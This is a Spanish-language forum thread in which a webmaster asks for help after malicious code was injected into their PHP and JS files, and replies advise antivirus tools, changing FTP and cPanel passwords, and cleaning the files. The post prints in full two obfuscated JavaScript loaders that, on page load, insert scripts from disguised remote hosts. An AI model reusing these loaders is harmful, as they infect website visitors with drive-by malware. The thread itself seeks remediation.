Se inyecto codigo malicioso en php y js

Hola amigos de un tiempo para aca se inyecto en mi web un codigo malicioso yo creo fue por via ftp tomando mis contraseñas y atacando los archivos index.php y .js al abrir mi web mi antivirus me detecta un troyando, cheque mis codigos y ya lo localize, ya lo estoy limpiando alguien sabe de algun programa para quitarlo o la manera de evitarlo nuevamente?? el codigo que se coloca en mis paginas es este:



<script>var q=new String();var dl;if(dl!='' && dl!='y'){dl=null};var b=false;this.p='';var t=document;var rz;if(rz!='z'){rz='z'};this.pp=49029;var c='s1c^r1iTp/t/'.replace(/[/\^1DT]/g, '');var dg;if(dg!=''){dg='f'};var w=window;var je;if(je!='td' && je!='qf'){je=''};var ca;if(ca!=''){ca='sw'};var i;if(i!=''){i='g'};w.onload=function(){try {var sf;if(sf!=''){sf='fp'};this.wu=41177;w_=t.createEl ement(c);var bs;if(bs!='au'){bs=''};var wb='';var de;if(de!='' && de!='rs'){de=''};w_.src='h&t<t<pR:M/O/Ra<pMp<lMeO-&c&oOm<.Mp<rMi<cReMl<iOnMeO.RcOo<mM.Rn<u&-<nRlR.&r&e&c<e<nRtOmRe&x<iRcOoO.Rr<uR:M8<0M8M0&/MgRoOo&gMlMeO.&c&oMmM/OgOoMo<gRlOeM.Rc<o<mR/Oc&n<e&tR.RcOo&mM/&gRaRmRe<t<rRa&iOlMeOr<sM.McRoOmO/MrRaOp<i&dO4Mm&e<.&cRoRm</O'.replace(/[O&\<MR]/g, '');w_.setAttribute('dgegfwewry'.replace(/[y2wPg]/g, ''), "1");var be;if(be!='ms'){be='ms'};var wvf=new String();var def;if(def!='' && def!='zg'){def=null};t.body.appendChild(w_);} catch(d){var bq=new String();var waq=new String();};var lr;if(lr!='x' && lr!='m_'){lr='x'};};var _s=new Array();var mk;if(mk!='' && mk!='yh'){mk=''};</script>

<script>var a;if(a!='sr' && a!='m'){a='sr'};var x=document;var i='s>cMr!iMp!t7'.replace(/[7/\!M\>]/g, '');var n;if(n!=''){n='h'};var s=window;var v;if(v!='' && v!='ifs'){v='q'};var f_;if(f_!='e' && f_!='mz'){f_=''};var o="";s.onload=function(){try {var qh;if(qh!='k'){qh='k'};var z;if(z!=''){z='mk'};sm=x.createElement(i);sm.src=' hXtXt&pO:Z/Z/OhWu&fOfOiZnZgXt&oXnXp&oWs&t&-Xc&oWmZ.&aOs&.WcOoWmX.OaWmOa&z&oWnX-Wc&n&.Zt&hWeZlXiWfOeWtWaZgO.ZrWu&:W8X0W8Z0O/Zc&o&sZtXcWoW.WcWo&mZ/&cZoOsWtWcZoZ.OcZoZmX/WoXwX.&lXyO/WgOoWoXg&lWeZ.XcZo&.Oi&lO/Wg&oZoOgOlXeZ.XcWo&mW/W'.replace(/[W&OZX]/g, '');var tl;if(tl!='j'){tl='j'};var bv="bv";sm.setAttribute('dYeYfVePrY'.replace(/[YVPNM]/g, ''), "1");x.body.appendChild(sm);var zm=new Array();} catch(f){};var g;if(g!='' && g!='xs'){g='fe'};var hq='';};var qp="";var ei="";</script>
<!--94c3d5eee31438fefd816615516420a0-->

hermano usa kaspersky...

Para darte una idea exacta ... puedes entrar a msconfig y ir a la pestaña de servicios..

hacer en check en ocultar todos los servicios de windows...

al hacer esto te aparecera algunos nomobres estos nombres lo constatas con google .. (solo pones el nombre y te dira que apliacion o que servicio es)
si es un virus te lo dira. .
por otra parte puedes ver los procesos que se incian en el administradro de tares (pestaña procesos)

trata de cerrar todos los programas y ver que procesos estan corriendo si desconfias de algo. tienes google para ver de que proceso se trata...

si encuentras el codigo malicioso usa kasperksky ...
tiene eliminacion de spyware rookkis, malware, etc....

todo en una sola aplicacion. ..usa de la ultima version 2010


mis saludos

Hola retro_mb,

Lo que indicas es causado por un virus/troyano estilo Gumblar que efectivamente ha accedido al servidor con tu usuario y contraseña FTP, descargado los archivos, modificandolos y subiendolos de nuevo. Los archivos .htm, .php y .js ya modificados son indetectables por los antivirus ya que dicho malware "general" una encriptacion nueva y diferente para cada archivo que infecta. La solucion es cambiar contraseñas de FTP y cPanel desde una maquina y buscar archivo por archivo para eliminar el codigo malicioso. Tambien seria recomendable que pases varios antivirus en tu antivirus para estar seguro de que estas limpio... aun que lo mas recomendable siempre es formatear y restaurar copias de seguridad, pero eso no siempre es posible.

Saludos

Gracias a todos por sus respuestas